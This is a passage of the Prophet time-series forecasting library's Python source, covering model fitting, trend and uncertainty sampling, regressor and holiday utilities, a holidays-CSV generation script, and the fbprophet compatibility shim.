@staticmethod def flat_growth_init(df): """Initialize flat growth. Provides a strong initialization for flat growth. Sets the growth to 0 and offset parameter as mean of history y_scaled values. Parameters ---------- df: pd.DataFrame with columns ds (date), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the linear growth function. """ k = 0 m = df['y_scaled'].mean() return k, m def preprocess(self, df: pd.DataFrame, **kwargs) -> ModelInputData: """ Reformats historical data, standardizes y and extra regressors, sets seasonalities and changepoints. Saves the preprocessed data to the instantiated object, and also returns the relevant components as a ModelInputData object. """ if ('ds' not in df) or ('y' not in df): raise ValueError( 'Dataframe must have columns "ds" and "y" with the dates and ' 'values respectively.' ) history = df[df['y'].notnull()].copy() if history.shape[0] < 2: raise ValueError('Dataframe has less than 2 non-NaN rows.') self.history_dates = pd.to_datetime(pd.Series(df['ds'].unique(), name='ds')).sort_values() self.history = self.setup_dataframe(history, initialize_scales=True) self.set_auto_seasonalities() seasonal_features, prior_scales, component_cols, modes = ( self.make_all_seasonality_features(self.history)) self.train_component_cols = component_cols self.component_modes = modes self.fit_kwargs = deepcopy(kwargs) self.set_changepoints() if self.growth in ['linear', 'flat']: cap = np.zeros(self.history.shape[0]) else: cap = self.history['cap_scaled'] return ModelInputData( T=self.history.shape[0], S=len(self.changepoints_t), K=seasonal_features.shape[1], tau=self.changepoint_prior_scale, trend_indicator=TrendIndicator[self.growth.upper()].value, y=self.history['y_scaled'], t=self.history['t'], t_change=self.changepoints_t, X=seasonal_features, sigmas=prior_scales, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], cap=cap, ) def calculate_initial_params(self, num_total_regressors: int) -> ModelParams: """ Calculates initial parameters for the model based on the preprocessed history. Parameters ---------- num_total_regressors: the count of seasonality fourier components plus holidays plus extra regressors. """ if self.growth == 'linear': k, m = self.linear_growth_init(self.history) elif self.growth == 'flat': k, m = self.flat_growth_init(self.history) elif self.growth == 'logistic': k, m = self.logistic_growth_init(self.history) return ModelParams( k=k, m=m, delta=np.zeros_like(self.changepoints_t), beta=np.zeros(num_total_regressors), sigma_obs=1.0, ) def fit(self, df, **kwargs): """Fit the Prophet model. This sets self.params to contain the fitted model parameters. It is a dictionary parameter names as keys and the following items: k (Mx1 array): M posterior samples of the initial slope. m (Mx1 array): The initial intercept. delta (MxN array): The slope change at each of N changepoints. beta (MxK matrix): Coefficients for K seasonality features. sigma_obs (Mx1 array): Noise level. Note that M=1 if MAP estimation. Parameters ---------- df: pd.DataFrame containing the history. Must have columns ds (date type) and y, the time series. If self.growth is 'logistic', then df must also have a column cap that specifies the capacity at each ds. kwargs: Additional arguments passed to the optimizing or sampling functions in Stan. Returns ------- The fitted Prophet object. """ if self.history is not None: raise Exception('Prophet object can only be fit once. ' 'Instantiate a new object.') model_inputs = self.preprocess(df, **kwargs) initial_params = self.calculate_initial_params(model_inputs.K) dat = dataclasses.asdict(model_inputs) stan_init = dataclasses.asdict(initial_params) if self.history['y'].min() == self.history['y'].max() and \ (self.growth == 'linear' or self.growth == 'flat'): self.params = stan_init self.params['sigma_obs'] = 1e-9 for par in self.params: self.params[par] = np.array([self.params[par]]) elif self.mcmc_samples > 0: self.params = self.stan_backend.sampling(stan_init, dat, self.mcmc_samples, **kwargs) else: self.params = self.stan_backend.fit(stan_init, dat, **kwargs) self.stan_fit = self.stan_backend.stan_fit # If no changepoints were requested, replace delta with 0s if len(self.changepoints) == 0: # Fold delta into the base rate k self.params['k'] = ( self.params['k'] + self.params['delta'].reshape(-1) ) self.params['delta'] = (np.zeros(self.params['delta'].shape) .reshape((-1, 1))) return self def predict(self, df: pd.DataFrame = None, vectorized: bool = True) -> pd.DataFrame: """Predict using the prophet model. Parameters ---------- df: pd.DataFrame with dates for predictions (column ds), and capacity (column cap) if logistic growth. If not provided, predictions are made on the history. vectorized: Whether to use a vectorized method to compute uncertainty intervals. Suggest using True (the default) for much faster runtimes in most cases, except when (growth = 'logistic' and mcmc_samples > 0). Returns ------- A pd.DataFrame with the forecast components. """ if self.history is None: raise Exception('Model has not been fit.') if df is None: df = self.history.copy() else: if df.shape[0] == 0: raise ValueError('Dataframe has no rows.') df = self.setup_dataframe(df.copy()) df['trend'] = self.predict_trend(df) seasonal_components = self.predict_seasonal_components(df) if self.uncertainty_samples: intervals = self.predict_uncertainty(df, vectorized) else: intervals = None # Drop columns except ds, cap, floor, and trend cols = ['ds', 'trend'] if 'cap' in df: cols.append('cap') if self.logistic_floor: cols.append('floor') # Add in forecast components df2 = pd.concat((df[cols], intervals, seasonal_components), axis=1) df2['yhat'] = ( df2['trend'] * (1 + df2['multiplicative_terms']) + df2['additive_terms'] ) return df2 @staticmethod def piecewise_linear(t, deltas, k, m, changepoint_ts): """Evaluate the piecewise linear function. Parameters ---------- t: np.array of times on which the function is evaluated. deltas: np.array of rate changes at each changepoint. k: Float initial rate. m: Float initial offset. changepoint_ts: np.array of changepoint times. Returns ------- Vector y(t). """ deltas_t = (changepoint_ts[None, :] <= t[..., None]) * deltas k_t = deltas_t.sum(axis=1) + k m_t = (deltas_t * -changepoint_ts).sum(axis=1) + m return k_t * t + m_t @staticmethod def piecewise_logistic(t, cap, deltas, k, m, changepoint_ts): """Evaluate the piecewise logistic function. Parameters ---------- t: np.array of times on which the function is evaluated. cap: np.array of capacities at each t. deltas: np.array of rate changes at each changepoint. k: Float initial rate. m: Float initial offset. changepoint_ts: np.array of changepoint times. Returns ------- Vector y(t). """ # Compute offset changes k_cum = np.concatenate((np.atleast_1d(k), np.cumsum(deltas) + k)) gammas = np.zeros(len(changepoint_ts)) for i, t_s in enumerate(changepoint_ts): gammas[i] = ( (t_s - m - np.sum(gammas)) * (1 - k_cum[i] / k_cum[i + 1]) # noqa W503 ) # Get cumulative rate and offset at each t k_t = k * np.ones_like(t) m_t = m * np.ones_like(t) for s, t_s in enumerate(changepoint_ts): indx = t >= t_s k_t[indx] += deltas[s] m_t[indx] += gammas[s] return cap / (1 + np.exp(-k_t * (t - m_t))) @staticmethod def flat_trend(t, m): """Evaluate the flat trend function. Parameters ---------- t: np.array of times on which the function is evaluated. m: Float initial offset. Returns ------- Vector y(t). """ m_t = m * np.ones_like(t) return m_t def predict_trend(self, df): """Predict trend using the prophet model. Parameters ---------- df: Prediction dataframe. Returns ------- Vector with trend on prediction dates. """ k = np.nanmean(self.params['k']) m = np.nanmean(self.params['m']) deltas = np.nanmean(self.params['delta'], axis=0) t = np.array(df['t']) if self.growth == 'linear': trend = self.piecewise_linear(t, deltas, k, m, self.changepoints_t) elif self.growth == 'logistic': cap = df['cap_scaled'] trend = self.piecewise_logistic( t, cap, deltas, k, m, self.changepoints_t) elif self.growth == 'flat': # constant trend trend = self.flat_trend(t, m) return trend * self.y_scale + df['floor'] def predict_seasonal_components(self, df): """Predict seasonality components, holidays, and added regressors. Parameters ---------- df: Prediction dataframe. Returns ------- Dataframe with seasonal components. """ seasonal_features, _, component_cols, _ = ( self.make_all_seasonality_features(df) ) if self.uncertainty_samples: lower_p = 100 * (1.0 - self.interval_width) / 2 upper_p = 100 * (1.0 + self.interval_width) / 2 X = seasonal_features.values data = {} for component in component_cols.columns: beta_c = self.params['beta'] * component_cols[component].values comp = np.matmul(X, beta_c.transpose()) if component in self.component_modes['additive']: comp *= self.y_scale data[component] = np.nanmean(comp, axis=1) if self.uncertainty_samples: data[component + '_lower'] = self.percentile( comp, lower_p, axis=1, ) data[component + '_upper'] = self.percentile( comp, upper_p, axis=1, ) return pd.DataFrame(data) def predict_uncertainty(self, df: pd.DataFrame, vectorized: bool) -> pd.DataFrame: """Prediction intervals for yhat and trend. Parameters ---------- df: Prediction dataframe. vectorized: Whether to use a vectorized method for generating future draws. Returns ------- Dataframe with uncertainty intervals. """ sim_values = self.sample_posterior_predictive(df, vectorized) lower_p = 100 * (1.0 - self.interval_width) / 2 upper_p = 100 * (1.0 + self.interval_width) / 2 series = {} for key in ['yhat', 'trend']: series['{}_lower'.format(key)] = self.percentile( sim_values[key], lower_p, axis=1) series['{}_upper'.format(key)] = self.percentile( sim_values[key], upper_p, axis=1) return pd.DataFrame(series) def sample_posterior_predictive(self, df: pd.DataFrame, vectorized: bool) -> Dict[str, np.ndarray]: """Prophet posterior predictive samples. Parameters ---------- df: Prediction dataframe. vectorized: Whether to use a vectorized method to generate future draws. Returns ------- Dictionary with posterior predictive samples for the forecast yhat and for the trend component. """ n_iterations = self.params['k'].shape[0] samp_per_iter = max(1, int(np.ceil( self.uncertainty_samples / float(n_iterations) ))) # Generate seasonality features once so we can re-use them. seasonal_features, _, component_cols, _ = ( self.make_all_seasonality_features(df) ) sim_values = {'yhat': [], 'trend': []} for i in range(n_iterations): if vectorized: sims = self.sample_model_vectorized( df=df, seasonal_features=seasonal_features, iteration=i, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], n_samples=samp_per_iter ) else: sims = [ self.sample_model( df=df, seasonal_features=seasonal_features, iteration=i, s_a=component_cols['additive_terms'], s_m=component_cols['multiplicative_terms'], ) for _ in range(samp_per_iter) ] for key in sim_values: for sim in sims: sim_values[key].append(sim[key]) for k, v in sim_values.items(): sim_values[k] = np.column_stack(v) return sim_values def sample_model(self, df, seasonal_features, iteration, s_a, s_m) -> Dict[str, np.ndarray]: """Simulate observations from the extrapolated generative model. Parameters ---------- df: Prediction dataframe. seasonal_features: pd.DataFrame of seasonal features. iteration: Int sampling iteration to use parameters from. s_a: Indicator vector for additive components s_m: Indicator vector for multiplicative components Returns ------- Dictionary with `yhat` and `trend`, each like df['t']. """ trend = self.sample_predictive_trend(df, iteration) beta = self.params['beta'][iteration] Xb_a = np.matmul(seasonal_features.values, beta * s_a.values) * self.y_scale Xb_m = np.matmul(seasonal_features.values, beta * s_m.values) sigma = self.params['sigma_obs'][iteration] noise = np.random.normal(0, sigma, df.shape[0]) * self.y_scale return { 'yhat': trend * (1 + Xb_m) + Xb_a + noise, 'trend': trend } def sample_model_vectorized( self, df: pd.DataFrame, seasonal_features: pd.DataFrame, iteration: int, s_a: np.ndarray, s_m: np.ndarray, n_samples: int, ) -> List[Dict[str, np.ndarray]]: """Simulate observations from the extrapolated generative model. Vectorized version of sample_model(). Returns ------- List (length n_samples) of dictionaries with arrays for trend and yhat, each ordered like df['t']. """ # Get the seasonality and regressor components, which are deterministic per iteration beta = self.params['beta'][iteration] Xb_a = np.matmul(seasonal_features.values, beta * s_a.values) * self.y_scale Xb_m = np.matmul(seasonal_features.values, beta * s_m.values) # Get the future trend, which is stochastic per iteration trends = self.sample_predictive_trend_vectorized(df, n_samples, iteration) # already on the same scale as the actual data sigma = self.params['sigma_obs'][iteration] noise_terms = np.random.normal(0, sigma, trends.shape) * self.y_scale simulations = [] for trend, noise in zip(trends, noise_terms): simulations.append({ 'yhat': trend * (1 + Xb_m) + Xb_a + noise, 'trend': trend }) return simulations def sample_predictive_trend(self, df, iteration): """Simulate the trend using the extrapolated generative model. Parameters ---------- df: Prediction dataframe. iteration: Int sampling iteration to use parameters from. Returns ------- np.array of simulated trend over df['t']. """ k = self.params['k'][iteration] m = self.params['m'][iteration] deltas = self.params['delta'][iteration] t = np.array(df['t']) T = t.max() # New changepoints from a Poisson process with rate S on [1, T] if T > 1: S = len(self.changepoints_t) n_changes = np.random.poisson(S * (T - 1)) else: n_changes = 0 if n_changes > 0: changepoint_ts_new = 1 + np.random.rand(n_changes) * (T - 1) changepoint_ts_new.sort() else: changepoint_ts_new = [] # Get the empirical scale of the deltas, plus epsilon to avoid NaNs. lambda_ = np.mean(np.abs(deltas)) + 1e-8 # Sample deltas deltas_new = np.random.laplace(0, lambda_, n_changes) # Prepend the times and deltas from the history changepoint_ts = np.concatenate((self.changepoints_t, changepoint_ts_new)) deltas = np.concatenate((deltas, deltas_new)) if self.growth == 'linear': trend = self.piecewise_linear(t, deltas, k, m, changepoint_ts) elif self.growth == 'logistic': cap = df['cap_scaled'] trend = self.piecewise_logistic(t, cap, deltas, k, m, changepoint_ts) elif self.growth == 'flat': trend = self.flat_trend(t, m) return trend * self.y_scale + df['floor'] def sample_predictive_trend_vectorized(self, df: pd.DataFrame, n_samples: int, iteration: int = 0) -> np.ndarray: """Sample draws of the future trend values. Vectorized version of sample_predictive_trend(). Returns ------- Draws of the trend values with shape (n_samples, len(df)). Values are on the scale of the original data. """ deltas = self.params["delta"][iteration] m = self.params["m"][iteration] k = self.params["k"][iteration] if self.growth == "linear": expected = self.piecewise_linear(df["t"].values, deltas, k, m, self.changepoints_t) elif self.growth == "logistic": expected = self.piecewise_logistic( df["t"].values, df["cap_scaled"].values, deltas, k, m, self.changepoints_t ) elif self.growth == "flat": expected = self.flat_trend(df["t"].values, m) else: raise NotImplementedError uncertainty = self._sample_uncertainty(df, n_samples, iteration) return ( (np.tile(expected, (n_samples, 1)) + uncertainty) * self.y_scale + np.tile(df["floor"].values, (n_samples, 1)) ) def _sample_uncertainty(self, df: pd.DataFrame, n_samples: int, iteration: int = 0) -> np.ndarray: """Sample draws of future trend changes, vectorizing as much as possible. Parameters ---------- df: DataFrame with columns `t` (time scaled to the model context), trend, and cap. n_samples: Number of future paths of the trend to simulate iteration: The iteration of the parameter set to use. Default 0, the first iteration. Returns ------- Draws of the trend changes with shape (n_samples, len(df)). Values are standardized. """ # handle only historic data if df["t"].max() <= 1: # there is no trend uncertainty in historic trends uncertainties = np.zeros((n_samples, len(df))) else: future_df = df.loc[df["t"] > 1] n_length = len(future_df) # handle 1 length futures by using history if n_length > 1: single_diff = np.diff(future_df["t"]).mean() else: single_diff = np.diff(self.history["t"]).mean() change_likelihood = len(self.changepoints_t) * single_diff deltas = self.params["delta"][iteration] m = self.params["m"][iteration] k = self.params["k"][iteration] mean_delta = np.mean(np.abs(deltas)) + 1e-8 if self.growth == "linear": mat = self._make_trend_shift_matrix(mean_delta, change_likelihood, n_length, n_samples=n_samples) uncertainties = mat.cumsum(axis=1).cumsum(axis=1) # from slope changes to actual values uncertainties *= single_diff # scaled by the actual meaning of the slope elif self.growth == "logistic": mat = self._make_trend_shift_matrix(mean_delta, change_likelihood, n_length, n_samples=n_samples) uncertainties = self._logistic_uncertainty( mat=mat, deltas=deltas, k=k, m=m, cap=future_df["cap_scaled"].values, t_time=future_df["t"].values, n_length=n_length, single_diff=single_diff, ) elif self.growth == "flat": # no trend uncertainty when there is no growth uncertainties = np.zeros((n_samples, n_length)) else: raise NotImplementedError # handle past included in dataframe if df["t"].min() <= 1: past_uncertainty = np.zeros((n_samples, np.sum(df["t"] <= 1))) uncertainties = np.concatenate([past_uncertainty, uncertainties], axis=1) return uncertainties @staticmethod def _make_trend_shift_matrix( mean_delta: float, likelihood: float, future_length: float, n_samples: int ) -> np.ndarray: """ Creates a matrix of random trend shifts based on historical likelihood and size of shifts. Can be used for either linear or logistic trend shifts. Each row represents a different sample of a possible future, and each column is a time step into the future. """ # create a bool matrix of where these trend shifts should go bool_slope_change = np.random.uniform(size=(n_samples, future_length)) < likelihood shift_values = np.random.laplace(0, mean_delta, size=bool_slope_change.shape) mat = shift_values * bool_slope_change n_mat = np.hstack([np.zeros((len(mat), 1)), mat])[:, :-1] mat = (n_mat + mat) / 2 return mat @staticmethod def _make_historical_mat_time(deltas, changepoints_t, t_time, n_row=1, single_diff=None): """ Creates a matrix of slope-deltas where these changes occured in training data according to the trained prophet obj """ if single_diff is None: single_diff = np.diff(t_time).mean() prev_time = np.arange(0, 1 + single_diff, single_diff) idxs = [] for changepoint in changepoints_t: idxs.append(np.where(prev_time > changepoint)[0][0]) prev_deltas = np.zeros(len(prev_time)) prev_deltas[idxs] = deltas prev_deltas = np.repeat(prev_deltas.reshape(1, -1), n_row, axis=0) return prev_deltas, prev_time def _logistic_uncertainty( self, mat: np.ndarray, deltas: np.ndarray, k: float, m: float, cap: np.ndarray, t_time: np.ndarray, n_length: int, single_diff: float = None, ) -> np.ndarray: """ Vectorizes prophet's logistic uncertainty by creating a matrix of future possible trends. Parameters ---------- mat: A trend shift matrix returned by _make_trend_shift_matrix() deltas: The size of the trend changes at each changepoint, estimated by the model k: Float initial rate. m: Float initial offset. cap: np.array of capacities at each t. t_time: The values of t in the model context (i.e. scaled so that anything > 1 represents the future) n_length: For each path, the number of future steps to simulate single_diff: The difference between each t step in the model context. Default None, inferred from t_time. Returns ------- A numpy array with shape (n_samples, n_length), representing the width of the uncertainty interval (standardized, not on the same scale as the actual data values) around 0. """ def ffill(arr): mask = arr == 0 idx = np.where(~mask, np.arange(mask.shape[1]), 0) np.maximum.accumulate(idx, axis=1, out=idx) return arr[np.arange(idx.shape[0])[:, None], idx] # for logistic growth we need to evaluate the trend all the way from the start of the train item historical_mat, historical_time = self._make_historical_mat_time(deltas, self.changepoints_t, t_time, len(mat), single_diff) mat = np.concatenate([historical_mat, mat], axis=1) full_t_time = np.concatenate([historical_time, t_time]) # apply logistic growth logic on the slope changes k_cum = np.concatenate((np.ones((mat.shape[0], 1)) * k, np.where(mat, np.cumsum(mat, axis=1) + k, 0)), axis=1) k_cum_b = ffill(k_cum) gammas = np.zeros_like(mat) for i in range(mat.shape[1]): x = full_t_time[i] - m - np.sum(gammas[:, :i], axis=1) ks = 1 - k_cum_b[:, i] / k_cum_b[:, i + 1] gammas[:, i] = x * ks # the data before the -n_length is the historical values, which are not needed, so cut the last n_length k_t = (mat.cumsum(axis=1) + k)[:, -n_length:] m_t = (gammas.cumsum(axis=1) + m)[:, -n_length:] sample_trends = cap / (1 + np.exp(-k_t * (t_time - m_t))) # remove the mean because we only need width of the uncertainty centered around 0 # we will add the width to the main forecast - yhat (which is the mean) - later return sample_trends - sample_trends.mean(axis=0) def predictive_samples(self, df: pd.DataFrame, vectorized: bool = True): """Sample from the posterior predictive distribution. Returns samples for the main estimate yhat, and for the trend component. The shape of each output will be (nforecast x nsamples), where nforecast is the number of points being forecasted (the number of rows in the input dataframe) and nsamples is the number of posterior samples drawn. This is the argument `uncertainty_samples` in the Prophet constructor, which defaults to 1000. Parameters ---------- df: Dataframe with dates for predictions (column ds), and capacity (column cap) if logistic growth. vectorized: Whether to use a vectorized method to compute possible draws. Suggest using True (the default) for much faster runtimes in most cases, except when (growth = 'logistic' and mcmc_samples > 0). Returns ------- Dictionary with keys "trend" and "yhat" containing posterior predictive samples for that component. """ df = self.setup_dataframe(df.copy()) return self.sample_posterior_predictive(df, vectorized) def percentile(self, a, *args, **kwargs): """ We rely on np.nanpercentile in the rare instances where there are a small number of bad samples with MCMC that contain NaNs. However, since np.nanpercentile is far slower than np.percentile, we only fall back to it if the array contains NaNs. See https://github.com/facebook/prophet/issues/1310 for more details. """ fn = np.nanpercentile if np.isnan(a).any() else np.percentile return fn(a, *args, **kwargs) def make_future_dataframe(self, periods, freq='D', include_history=True): """Simulate the trend using the extrapolated generative model. Parameters ---------- periods: Int number of periods to forecast forward. freq: Any valid frequency for pd.date_range, such as 'D' or 'M'. include_history: Boolean to include the historical dates in the data frame for predictions. Returns ------- pd.Dataframe that extends forward from the end of self.history for the requested number of periods. """ if self.history_dates is None: raise Exception('Model has not been fit.') if freq is None: # taking the tail makes freq inference more reliable freq = pd.infer_freq(self.history_dates.tail(5)) # returns None if inference failed if freq is None: raise Exception('Unable to infer `freq`') last_date = self.history_dates.max() dates = pd.date_range( start=last_date, periods=periods + 1, # An extra in case we include start freq=freq) dates = dates[dates > last_date] # Drop start if equals last_date dates = dates[:periods] # Return correct number of periods if include_history: dates = np.concatenate((np.array(self.history_dates), dates)) return pd.DataFrame({'ds': dates}) def plot(self, fcst, ax=None, uncertainty=True, plot_cap=True, xlabel='ds', ylabel='y', figsize=(10, 6), include_legend=False): """Plot the Prophet forecast. Parameters ---------- fcst: pd.DataFrame output of self.predict. ax: Optional matplotlib axes on which to plot. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis figsize: Optional tuple width, height in inches. include_legend: Optional boolean to add legend to the plot. Returns ------- A matplotlib figure. """ return plot( m=self, fcst=fcst, ax=ax, uncertainty=uncertainty, plot_cap=plot_cap, xlabel=xlabel, ylabel=ylabel, figsize=figsize, include_legend=include_legend ) def plot_components(self, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None): """Plot the Prophet forecast components. Will plot whichever are available of: trend, holidays, weekly seasonality, and yearly seasonality. Parameters ---------- fcst: pd.DataFrame output of self.predict. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. Returns ------- A matplotlib figure. """ return plot_components( m=self, fcst=fcst, uncertainty=uncertainty, plot_cap=plot_cap, weekly_start=weekly_start, yearly_start=yearly_start, figsize=figsize ) File: python/prophet/utilities.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import numpy as np import pandas as pd def regressor_index(m, name): """Given the name of a regressor, return its (column) index in the `beta` matrix. Parameters ---------- m: Prophet model object, after fitting. name: Name of the regressor, as passed into the `add_regressor` function. Returns ------- The column index of the regressor in the `beta` matrix. """ return np.extract( m.train_component_cols[name] == 1, m.train_component_cols.index )[0] def regressor_coefficients(m): """Summarise the coefficients of the extra regressors used in the model. For additive regressors, the coefficient represents the incremental impact on `y` of a unit increase in the regressor. For multiplicative regressors, the incremental impact is equal to `trend(t)` multiplied by the coefficient. Coefficients are measured on the original scale of the training data. Parameters ---------- m: Prophet model object, after fitting. Returns ------- pd.DataFrame containing: - `regressor`: Name of the regressor - `regressor_mode`: Whether the regressor has an additive or multiplicative effect on `y`. - `center`: The mean of the regressor if it was standardized. Otherwise 0. - `coef_lower`: Lower bound for the coefficient, estimated from the MCMC samples. Only different to `coef` if `mcmc_samples > 0`. - `coef`: Expected value of the coefficient. - `coef_upper`: Upper bound for the coefficient, estimated from MCMC samples. Only to different to `coef` if `mcmc_samples > 0`. """ assert len(m.extra_regressors) > 0, 'No extra regressors found.' coefs = [] for regressor, params in m.extra_regressors.items(): beta = m.params['beta'][:, regressor_index(m, regressor)] if params['mode'] == 'additive': coef = beta * m.y_scale / params['std'] else: coef = beta / params['std'] percentiles = [ (1 - m.interval_width) / 2, 1 - (1 - m.interval_width) / 2, ] coef_bounds = np.quantile(coef, q=percentiles) record = { 'regressor': regressor, 'regressor_mode': params['mode'], 'center': params['mu'], 'coef_lower': coef_bounds[0], 'coef': np.mean(coef), 'coef_upper': coef_bounds[1], } coefs.append(record) return pd.DataFrame(coefs) def warm_start_params(m): """ Retrieve parameters from a trained model in the format used to initialize a new Stan model. Note that the new Stan model must have these same settings: n_changepoints, seasonality features, mcmc sampling for the retrieved parameters to be valid for the new model. Parameters ---------- m: A trained model of the Prophet class. Returns ------- A Dictionary containing retrieved parameters of m. """ res = {} for pname in ['k', 'm', 'sigma_obs']: if m.mcmc_samples == 0: res[pname] = m.params[pname][0][0] else: res[pname] = np.mean(m.params[pname]) for pname in ['delta', 'beta']: if m.mcmc_samples == 0: res[pname] = m.params[pname][0] else: res[pname] = np.mean(m.params[pname], axis=0) return res File: python/prophet/make_holidays.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import numpy as np import pandas as pd import holidays def get_country_holidays_class(country): """Get class for a supported country. Parameters ---------- country: country code Returns ------- A valid country holidays class """ substitutions = { "TU": "TR", # For compatibility with Turkey as 'TU' cases. } country = substitutions.get(country, country) if not hasattr(holidays, country): raise AttributeError(f"Holidays in {country} are not currently supported!") return getattr(holidays, country) def get_holiday_names(country): """Return all possible holiday names of given country Parameters ---------- country: country name Returns ------- A set of all possible holiday names of given country """ country_holidays = get_country_holidays_class(country) return set(country_holidays(language="en_US", years=np.arange(1995, 2045)).values()) def make_holidays_df(year_list, country, province=None, state=None): """Make dataframe of holidays for given years and countries Parameters ---------- year_list: a list of years country: country name Returns ------- Dataframe with 'ds' and 'holiday', which can directly feed to 'holidays' params in Prophet """ country_holidays = get_country_holidays_class(country) holidays = country_holidays(expand=False, language="en_US", subdiv=province, years=year_list) holidays_df = pd.DataFrame( [(date, holidays.get_list(date)) for date in holidays], columns=["ds", "holiday"], ) holidays_df = holidays_df.explode("holiday") holidays_df.reset_index(inplace=True, drop=True) holidays_df["ds"] = pd.to_datetime(holidays_df["ds"]) return holidays_df File: python/scripts/generate_holidays_file.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import re import unicodedata import pandas as pd import numpy as np from holidays import list_supported_countries from prophet.make_holidays import make_holidays_df def utf8_to_ascii(text: str) -> str: """Holidays often have utf-8 characters. These are not allowed in R package data (they generate a NOTE). TODO: revisit whether we want to do this lossy conversion. """ ascii_text = unicodedata.normalize("NFD", text).encode("ascii", "ignore").decode("ascii") # Remove trailing empty brackets and spaces. ascii_text = re.sub(r"\(\)$", "", ascii_text).strip() # Check if anything converted if sum(1 for x in ascii_text if x not in [" ", "(", ")", ","]) == 0: return "FAILED_TO_PARSE" else: return ascii_text def generate_holidays_df() -> pd.DataFrame: """Generate csv file of all possible holiday names, ds, and countries, year combination.""" country_codes = set(list_supported_countries().keys()) # For compatibility with Turkey as 'TU' cases. country_codes.add("TU") all_holidays = [] for country_code in country_codes: df = make_holidays_df( year_list=np.arange(1995, 2045, 1).tolist(), country=country_code, ) df["country"] = country_code all_holidays.append(df) generated_holidays = pd.concat(all_holidays, axis=0, ignore_index=True) generated_holidays["year"] = generated_holidays.ds.dt.year generated_holidays.sort_values(["country", "ds", "holiday"], inplace=True) # Convert to ASCII, and drop holidays that fail to convert generated_holidays["holiday"] = generated_holidays["holiday"].apply(utf8_to_ascii) failed_countries = generated_holidays.loc[ generated_holidays["holiday"] == "FAILED_TO_PARSE", "country" ].unique() if len(failed_countries) > 0: print("Failed to convert UTF-8 holidays for:") print("\n".join(failed_countries)) assert "FAILED_TO_PARSE" not in generated_holidays["holiday"].unique() return generated_holidays if __name__ == "__main__": import argparse import pathlib if not pathlib.Path.cwd().stem == "python": raise RuntimeError("Run script from prophet/python directory") OUT_CSV_PATH = pathlib.Path(".") / ".." / "R/data-raw/generated_holidays.csv" parser = argparse.ArgumentParser() parser.add_argument("-o", "--outfile", default=OUT_CSV_PATH) args = parser.parse_args() df = generate_holidays_df() df.to_csv(args.outfile, index=False) File: python_shim/setup.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from setuptools import setup, find_packages with open('README.md', 'r', encoding='utf-8') as f: long_description = f.read() with open('requirements.txt', 'r') as f: install_requires = f.read().splitlines() setup( name='fbprophet', version='1.0.1', description='Automatic Forecasting Procedure', url='https://facebook.github.io/prophet/', author='Sean J. Taylor <[email protected]>, Ben Letham <[email protected]>', author_email='[email protected]', license='MIT', packages=find_packages(), setup_requires=[], install_requires=install_requires, python_requires='>=3', zip_safe=False, include_package_data=True, test_suite='fbprophet.tests', classifiers=[ 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', ], long_description=long_description, long_description_content_type='text/markdown', ) File: python_shim/fbprophet/serialize.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.serialize import * File: python_shim/fbprophet/plot.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.plot import * File: python_shim/fbprophet/models.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.models import * File: python_shim/fbprophet/diagnostics.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.diagnostics import * File: python_shim/fbprophet/__init__.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import logging from prophet.forecaster import Prophet logger = logging.getLogger('fbprophet') logger.warning( 'As of v1.0, the package name has changed from "fbprophet" to "prophet". ' 'Please update references in your code accordingly.' ) File: python_shim/fbprophet/forecaster.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.forecaster import * File: python_shim/fbprophet/make_holidays.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from prophet.make_holidays import *
